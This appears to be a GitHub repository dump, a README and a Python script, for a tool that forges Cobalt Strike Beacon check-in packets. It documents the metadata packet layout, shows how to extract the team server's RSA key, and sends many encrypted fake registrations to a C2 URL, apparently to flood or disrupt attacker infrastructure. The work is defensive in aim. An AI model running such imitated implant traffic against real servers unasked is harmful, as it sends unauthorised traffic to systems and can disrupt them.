├── CSMOCK.png ├── README.md └── cs_mock.py /CSMOCK.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/burpheart/CS_mock/f93e19f53e4fe31b4d74c6cb94989ce979b06846/CSMOCK.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CS_mock 2 | 模拟cobalt strike beacon上线包. Simulates a Cobalt Strike Beacon check-in (metadata) packet. 3 | 4 | 拿到c2通信使用的RSA public key和提交metadata的url 即可模拟上线 (With the RSA public key the C2 uses and the URL the Beacon submits its metadata to, a check-in can be simulated: the script RSA-encrypts a fake metadata blob with that key and sends it base64-encoded in the `Cookie` header of a GET to that URL.) 5 | 6 | Use CobaltStrikeParser (https://github.com/Sentinel-One/CobaltStrikeParser) to extract the public key from the payload: `parse_beacon_config.py payload_url --json` 7 | 8 | Remember to remove the extra (trailing) padding from the extracted public key before pasting it into the PEM block in cs_mock.py — see the screenshot below. 9 | ![](CSMOCK.png) 10 | 11 | 12 | metadata 协议结构 (metadata packet layout; all multi-byte integers are written big-endian by cs_mock.py except the two charset fields) 13 | 14 | ``` 15 | ┌─────────────────────────────────────────────────┐ 16 | │ head │ 17 | ├──────────────────────────┬──────────────────────┤ 18 | │ 4 Byte │ 4 Byte │ 19 | ├──────────────────────────┼──────────────────────┤ 20 | │ magic 00 00 be ef │ metadata_len │ 21 | ├──────────────────────────┴──────────────────────┤ 22 | │ metadata │ 23 | ├─────────────────────────────────────────────────┤ 24 | │ 16 Byte │ 25 | ├─────────────────────────────────────────────────┤ 26 | │ aes_key │ 27 | ├────────┬────────┬────────┬───────┬──────┬───────┤ 28 | │ 2 byte │ 2 byte │ 4 byte │ 4 byte│2 byte│ 1 byte│ 29 | ├────────┼────────┼────────┼───────┼──────┼───────┤ 30 | │os_info1│os_info2│ id │ pid │ port │ flag │ 31 | ├────────┼────────┼────────┼───────┼──────┼───────┤ 32 | │ 1 byte │ 1 byte │ 2 byte │ 4 byte│4 byte│4 byte │ 33 | ├────────┼────────┼────────┼───────┼──────┼───────┤ 34 | │ os_ver │os_ver_2│os_build│ ptr_1 │ptr_2 │ptr_3 │ 35 | ├────────┴────┬───┴────────┴───────┴──────┴───────┤ 36 | │ 4 byte │ TAB split TEXT │ 37 | ├─────────────┼───────────────────────────────────┤ 38 | │inner_ip_addr│ computername username processname │ 39 | 
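#!/usr/bin/env python3
# coding=utf-8
"""Emit fake Cobalt Strike Beacon check-in ("metadata") packets to a C2 server.

Each packet follows the layout documented in README.md: a 16-byte session
key, two charset fields, beacon id / pid / port / flag, OS version and build,
three pointer fields, the internal IP, and the TAB-separated computer name,
user name and process name.  The body is prefixed with the ``00 00 BE EF``
magic and a 4-byte big-endian length, RSA-encrypted with the team server's
public key and delivered the way the real Beacon delivers it: base64 in the
``Cookie`` header of a GET to the metadata URL.

Operator setup: set ``C2_URL`` and paste the team server's public key into
``PUBLIC_KEY_PEM``.  Extract the key with CobaltStrikeParser
(``parse_beacon_config.py payload_url --json``) and remove the extra padding
from it first.  The target is an adversary-controlled server: nothing it
returns is interpreted, responses are read with a size cap and discarded.
"""
import base64
import os
import random
import string
import urllib.error
import urllib.request

import hexdump  # only used by the commented-out debug dump in main()
import rsa

# --- operator configuration -------------------------------------------------
# C2 server metadata URL (CobaltStrikeParser: C2Server).
C2_URL = 'http://192.168.234.100/pixel.gif'

# Team server RSA public key.  Replace the placeholder body with the key
# CobaltStrikeParser prints, minus its extra padding; load_pkcs1_openssl_pem()
# rejects the placeholder, so a bad key fails before any packet is sent.
PUBLIC_KEY_PEM = """
-----BEGIN PUBLIC KEY-----
MIGfXXXXXXXXXXXXXXXX==
-----END PUBLIC KEY-----
"""

BEACON_COUNT = 10        # number of fake beacons to register per run
HTTP_TIMEOUT = 10.0      # seconds; never block forever on a dead or stalling C2
MAX_RESPONSE = 1 << 20   # bytes of C2 response we are willing to read

# Fixed packet pieces (byte values identical to the original script).
MAGIC = b'\x00\x00\xBE\xEF'        # packet magic
CHARSET = b'\xa8\x03'              # name charset, little-endian int (0x03a8 = 936)
BEACON_PORT = b'\x00\x00'          # port field: 0
BEACON_FLAG = b'\x04'              # flag field
OS_VERSION = b'\x06' + b'\x02'     # os_ver 6, os_ver_2 2
OS_BUILD = b'\x23\xf0'             # os_build (0x23f0 = 9200 read big-endian)
PTR_1 = b'\x00\x00\x00\x00'
PTR_2 = b'\x76\x91\x0a\x60'
PTR_3 = b'\x76\x90\xf5\x50'
NAME_ALPHABET = string.ascii_letters + string.digits


def _random_name(length=6):
    """Return ``length`` distinct random alphanumeric characters as bytes."""
    return ''.join(random.sample(NAME_ALPHABET, length)).encode('utf8')


def _as_bytes(value):
    """Accept str or a bytes-like value for a name field; return bytes."""
    if isinstance(value, str):
        return value.encode('utf8')
    return bytes(value)


def build_metadata(session_key=None, beacon_id=None, pid=None, inner_ip=None,
                   computer_name=None, user_name=None, process_name=None):
    """Build one complete metadata packet (magic + length + body) as bytes.

    Every argument defaults to a fresh random value, so repeated calls give
    distinct beacons; pass explicit values for a reproducible packet.

    Args:
        session_key: 16 raw bytes of the per-beacon key.  Defaults to
            os.urandom(16), i.e. full-range CSPRNG bytes (the original used
            random.getrandbits(4), which only yields values 0x00-0x0f).
        beacon_id: 0 .. 9999999, written big-endian in 4 bytes.
        pid: 0 .. 65535, written big-endian in 4 bytes.
        inner_ip: 4 raw bytes written verbatim as the inner_ip_addr field.
        computer_name, user_name, process_name: str or bytes; joined with
            0x09 (TAB) as the trailing text field.

    Raises:
        ValueError: session_key / inner_ip are not 16 / 4 bytes, or a name
            contains a TAB (the text field is TAB-delimited, so an embedded
            TAB would shift the split on the receiving side).
        OverflowError: beacon_id or pid does not fit in 4 unsigned bytes.
    """
    if session_key is None:
        session_key = os.urandom(16)
    session_key = bytes(session_key)
    if len(session_key) != 16:
        raise ValueError('session_key must be exactly 16 bytes')
    if inner_ip is None:
        inner_ip = os.urandom(4)
    inner_ip = bytes(inner_ip)
    if len(inner_ip) != 4:
        raise ValueError('inner_ip must be exactly 4 bytes')
    if beacon_id is None:
        beacon_id = random.randint(0, 9999999)
    if pid is None:
        pid = random.randint(0, 65535)

    names = [
        _random_name() if value is None else _as_bytes(value)
        for value in (computer_name, user_name, process_name)
    ]
    if any(b'\x09' in name for name in names):
        raise ValueError('names must not contain TAB (field is TAB-delimited)')

    body = b''.join((
        session_key,
        CHARSET,
        CHARSET,
        beacon_id.to_bytes(4, 'big'),
        pid.to_bytes(4, 'big'),
        BEACON_PORT,
        BEACON_FLAG,
        OS_VERSION,
        OS_BUILD,
        PTR_1,
        PTR_2,
        PTR_3,
        inner_ip,
        b'\x09'.join(names),
    ))
    # Header: magic, then the body length as a 4-byte big-endian int.
    return MAGIC + len(body).to_bytes(4, 'big') + body


def encrypt_metadata(packet, pubkey):
    """RSA (PKCS#1 v1.5) encrypt ``packet`` with the team server's public key.

    The whole packet must fit in a single RSA block: key size in bytes minus
    11, i.e. 117 bytes for a 1024-bit key (the ``MIGf...`` placeholder above
    is one).  rsa.encrypt() raises OverflowError when it does not; long
    name fields are the usual cause.
    """
    return rsa.encrypt(packet, pubkey)


def send_metadata(url, encrypted, timeout=HTTP_TIMEOUT):
    """Deliver one encrypted packet: base64 in the Cookie header of a GET.

    Returns at most MAX_RESPONSE bytes of the response body.  The response
    comes from an adversary-controlled server and is not interpreted here.
    Raises OSError (urllib.error.URLError / HTTPError, socket timeouts) on
    connection failure, timeout or a non-2xx status.
    """
    request = urllib.request.Request(
        url,
        headers={'Cookie': base64.b64encode(encrypted).decode('utf-8')},
    )
    # The context manager closes the socket; the timeout stops a stalled C2
    # from hanging the whole run.
    with urllib.request.urlopen(request, timeout=timeout) as response:
        return response.read(MAX_RESPONSE)


def main(count=BEACON_COUNT):
    """Register ``count`` fake beacons with the configured C2 server."""
    # Parse the key once (the original re-parsed it for every beacon); a bad
    # or still-padded key fails here, before anything touches the network.
    pubkey = rsa.PublicKey.load_pkcs1_openssl_pem(PUBLIC_KEY_PEM)
    for index in range(1, count + 1):
        packet = build_metadata()
        encrypted = encrypt_metadata(packet, pubkey)
        try:
            send_metadata(C2_URL, encrypted)
        except OSError as exc:
            # One refused / timed-out request should not abort the rest.
            print('beacon {}/{}: request failed: {}'.format(index, count, exc))
        # Debug aids kept from the original script:
        # print('base64:', base64.b64encode(encrypted).decode('utf-8'))
        # print(hexdump.hexdump(packet))


if __name__ == '__main__':
    main()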